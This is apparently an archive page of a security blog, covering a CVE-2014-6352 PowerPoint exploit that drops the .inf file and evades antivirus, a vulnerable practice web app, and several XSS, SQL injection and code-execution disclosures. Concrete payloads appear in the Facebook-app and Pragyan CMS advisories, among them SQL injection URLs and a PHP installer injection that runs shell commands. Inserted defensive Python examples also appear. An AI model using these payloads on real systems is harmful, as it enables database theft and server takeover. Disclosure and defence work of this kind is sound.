Wednesday, November 5, 2014

CVE-2014-6352 When defenses fall - eliminating the use of .inf files and bypassing Antiviruses!




Regarding CVE-2014-6352 and CVE-2014-4114: as we know, .inf files were used in the malware samples found in the wild to execute the executable payloads. One of the workarounds from Microsoft was to block the launching of executables via Setup information files (https://technet.microsoft.com/en-us/library/security/ms14-060.aspx).

But the claim that CVE-2014-6352 requires .inf files to execute the payload is a myth, and that is the myth we are going to bust in this blog post.

We took a public sample with an embedded executable and an embedded .inf file. When we unzipped it, there were two OLE objects inside:

OleObject1.bin - the embedded executable
OleObject2.bin - the embedded .inf file

We created another OLE object with putty.exe as the executable payload and renamed it OleObject2.bin.

We replaced the original object in the exploit sample with it and created a .ppsx file. When we executed the PoC .ppsx, BOOM, our payload got executed, proving that using .inf files is not necessary in this particular exploit.

With this method we bypassed 3 things:

1) One of the workarounds from MS to prevent the exploit
2) Antivirus signatures
3) The size limit of the executable

Below is the AV scan report of the PoC we created. The bad news is that none of the major AVs detect the exploit.
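As an added example (our own code, not the authors' tooling), the check below takes the defender's side of the point made above: it lists the embedded OLE objects inside an OOXML package and flags any object that carries a PE image, without requiring a .inf object to be present. The package builder and both blobs are constructed for illustration and are not a real sample; the PE heuristic looks for a DOS header whose e_lfanew field points at a "PE\0\0" signature instead of parsing the compound-file streams.

```python
import io
import re
import zipfile

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE compound file header
INF_MARKERS = (b"[version]", b"[defaultinstall]", b"signature=")  # typical .inf content

def classify_blob(data):
    """Label an embedded object: OLE container, PE image inside, .inf text inside."""
    labels = set()
    if data.startswith(CFB_MAGIC):
        labels.add("ole-compound")
    # A PE image is an 'MZ' DOS header whose e_lfanew (offset 0x3C) points at 'PE\0\0'.
    for m in re.finditer(b"MZ", data):
        off = m.start()
        e_lfanew = int.from_bytes(data[off + 0x3C:off + 0x40], "little")
        if data[off + e_lfanew:off + e_lfanew + 4] == b"PE\x00\x00":
            labels.add("pe-executable")
            break
    if any(marker in data.lower() for marker in INF_MARKERS):
        labels.add("inf-script")
    return labels

def scan_package(pkg_bytes):
    """Return {zip member: labels} for every embedded OLE object in an OOXML package."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(pkg_bytes)) as z:
        for name in z.namelist():
            if "/embeddings/" in name.lower() and name.lower().endswith(".bin"):
                findings[name] = classify_blob(z.read(name))
    return findings

def is_suspicious(findings):
    # An embedded PE is enough on its own; the .inf object is not required.
    return any("pe-executable" in labels for labels in findings.values())

def _fake_pe_stub():
    """Constructed minimal MZ/PE header (not a runnable program) for the sample."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)       # 0x40-byte DOS header
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> right after it
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20

def build_sample_package():
    """Constructed in-memory package mimicking the two-object layout described above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/embeddings/oleObject1.bin", CFB_MAGIC + b"\x00" * 8 + _fake_pe_stub())
        z.writestr("ppt/embeddings/oleObject2.bin", CFB_MAGIC + b'[Version]\r\nSignature="$Chicago$"\r\n')
    return buf.getvalue()
```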





Friday, October 31, 2014

ASL HackMe Labs - Yet another vulnerable web application!





ASL HackMe Labs is yet another vulnerable web application for practicing various web-based attacks. It can be installed on both XAMPP and WAMP.
To install, extract all contents into the web root.
Create a database named "security" and import the security.sql file into it.
For RFI to work, set allow_url_include=On and allow_url_fopen=On in your php.ini.


Attacks you can practice with ASL HackMe Labs:

1) SQLi login bypass
2) SQLi Error Based
3) SQLi UNION based
4) Blind SQLi
5) SQLi filter bypassing
6) SQLi with INSERT_INTO
7) User Agent based SQLi
8) XSS through SQLi
9) Upload webshell through SQLi
10) XSS
11) User Agent based XSS
12) Full Path Disclosure
13) LFI
14) RFI
15) PHP Wrapper injections
16) Cookie based SQLi
17) Image Upload bypasses
18) Javascript Login Bypass
19) Logs Poisoning
20) Remote Command Execution
21) Header Injections

There are also three realistic scenarios.


Download ASL HackMe Labs Here




Keep checking our blog and youtube channel for ASL HackMe Labs tutorials:
Blog: http://www.aslitsecurity.blogspot.com/
Youtube Channel: https://www.youtube.com/channel/UCvQqfl3gCjepWk5VwMJS5oA
Website: www.aslitsecurity.com
Trainings: www.training.aslitsecurity.com

Thursday, October 23, 2014

CVE-2014-6352 OLE Remote Code Execution Vulnerability

Here is a working exploit PoC for the CVE-2014-6352 OLE Remote Code Execution Vulnerability. It is available through our exploit subscription and binary analysis program.




Wednesday, April 18, 2012

AOL search XSS

An XSS vulnerability in AOL search. We are trying to contact the AOL team; no reply from them yet.

Sunday, February 12, 2012

Yahoo Cross Site Scripting Vulnerability!

There is a Cross Site Scripting vulnerability in a yahoo.com subdomain, upcoming.yahoo.com. This vulnerability allows an attacker to steal cookies and perform session hijacking attacks, or to use XSS worms. The vendor has been notified of the vulnerability details.

Monday, March 21, 2011

Another vulnerability in facebook apps!

This is the second SQL injection we found in Facebook apps.

We tried to contact the developers but got no response from them, so we decided to release the vulnerability.

Note: There are a few more Facebook apps which we found to be vulnerable to SQL injection attacks. We are waiting for the developers to patch those and will post them as soon as they are patched.

A proof of concept of the vulnerability can be seen at:

http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

Wednesday, March 9, 2011

Sql Injection in Facebook applications!

We found a vulnerability in two Facebook applications. One is patched now, so we are disclosing the vulnerability.


There was a SQL injection vulnerability in apps.facebook.com:

Vendor::twmarketplace
Location:: http://apps.facebook.com/twmarketplace/post.php?postid=
Severity:: Critical
Impact:: Database access/server control


It was possible to extract all data from all databases located on that server.


Changelog::
7/3/2010 - Facebook vendors notified
8/3/2010 - Response from vendor
8/3/2010 - Vendor patched the vulnerability
9/3/2010 - Public disclosure

Saturday, February 26, 2011

Pragyan CMS v3.0 multiple vulnerabilities!

During Pragyan's hacking challenge we found these vulnerabilities in their open source CMS.


#Pragyan CMS v 3.0 multiple Vulnerabilities


#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,

abhilyall[at]gmail[dot]com

#Web - http://www.aslitsecurity.com/

#Blog - http://bugix-security.blogspot.com

#http://www.aslitsecurity.blogspot.com/

#Pragyan CMS v 3.0



Technical Description





1) Code execution in INSTALL/install.php

The script does not correctly validate the entered fields.

It is possible to write the following string into the password field:



");echo exec($_GET["a"]);echo ("



or into other fields, with JavaScript turned off.

cms/config.inc.php will then contain the code:

define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");

which allows command execution.



EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la
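As an added illustration (our own Python model, not Pragyan's code, which the advisory does not show), the two rendering functions below reproduce the config.inc.php line above from the quoted payload and contrast it with a writer that emits the value as a PHP single-quoted literal, where only backslash and single quote need escaping and "$" is never interpolated. The statement counter is a crude tokenizer added only to make the difference visible; the constant-name check is our assumption about what such a writer should enforce.

```python
import re

# The string from the advisory, as typed into the password field of the installer.
PAYLOAD = '");echo exec($_GET["a"]);echo ("'

def render_define_unsafe(name, value):
    """Naive interpolation: the value can close the literal and append PHP statements."""
    return 'define("%s","%s");' % (name, value)

def php_single_quoted(value):
    """Emit a PHP single-quoted literal; only '\\' and '\\'' are special inside it."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"

def render_define_safe(name, value):
    """Hardened writer: fixed identifier for the name, properly quoted literal for the value."""
    if not re.fullmatch(r"[A-Z_][A-Z0-9_]*", name):
        raise ValueError("constant name must be a fixed identifier, not user input")
    return "define(%s, %s);" % (php_single_quoted(name), php_single_quoted(value))

def statements_outside_strings(php_line):
    """Count ';' that are not inside a string literal: a crude 'how many statements' check."""
    count, quote, i = 0, None, 0
    while i < len(php_line):
        c = php_line[i]
        if quote:
            if c == "\\":
                i += 1            # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'":
            quote = c
        elif c == ";":
            count += 1
        i += 1
    return count
```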



2) SQL injection

- get MySQL version, EXPLOIT::

http://target.com/path/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--



Solution

Update to Pragyan CMS 3.0 rev. 274



Changelog

2011-19-02 : Initial release

2011-20-02 : Reported to vendor

2011-25-02 : patch released

2011-25-02 : public disclosure



Credits

Villy

Abhishek Lyall

pragyan.org

http://bugix-security.blogspot.com

http://www.aslitsecurity.blogspot.com/





Abhishek Lyall